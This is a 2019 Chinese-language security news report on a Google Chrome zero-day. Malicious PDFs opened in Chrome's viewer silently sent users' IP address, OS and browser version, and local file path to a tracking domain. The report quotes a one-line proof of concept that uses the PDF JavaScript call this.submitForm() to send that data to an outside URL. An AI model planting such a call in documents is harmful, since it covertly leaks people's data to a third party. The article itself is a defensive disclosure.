警告!不要用Chrome查看pdf文件

2019-03-09 00:04发布

概述

漏洞检查服务公司EdgeSpot发现,攻击者利用Google Chrome 0 day漏洞可以追踪用户/收集用户数据。

事件详情

根据外媒报道,从去年12月开始,EdgeSpot公司研究人员陆续发现一些利用Google Chrome 0 day漏洞的恶意PDF样本。当用户使用本地Google Chrome打开这些恶意PDF样本会产生一些可疑的流量。

以下为一个恶意PDF样本分析:

该恶意PDF样本被标记为POTENTIAL ZERO-DAY ATTACK (Google Chrome), PERSONAL INFORMATION LEAKAGE,

当用户使用本地Google Chrome打开之后,通过在后台抓取流量,研究人员发现了一些数据在没有用户交互的情况下被发送给域名readnotify.com,也就是说这些数据在没有用户授权的情况下被窃取了。

用户查看PDF文件时,该PDF实际上是在与C2服务器进行通信。根据HTTP包的信息,被收集和发送的用户信息包括:

ü 用户的公网IP地址

ü OS和Chrome版本等

ü PDF文件在用户电脑中的完整路径

事件后续

近期,研究人员又发现一些更多的恶意PDF样本。之前样本不同的是,新样本:

ü 影响的是Google Chrome(作为本地PDF阅读器),而不是Adobe Reader。

ü 不允许窃取NTLM,但是会泄露操作系统信息和文件保存的路径。

研究人员分析样本发现在stream-1中有可疑的JS代码。反混淆代码后,研究人员发现根源在于"this.submitForm()" PDF Javascript API。研究人员开发了一个PoC,像this.submitForm('http://google.com/test')这样的一个简单的API调用就会使Google Chrome发送个人信息到google.com。研究人员已经与Google取得联系,确认了0 day漏洞的详细情况,Chrome团队称该漏洞会在4月底进行更新和修复。研究人员建议相关用户在Chrome修复该漏洞前不要使用Chrome查看本地PDF文件,如果只能使用Chrome,那么查看的时候可疑断开网络连接。

文章来源: https://www.toutiao.com/group/6665832624298131975/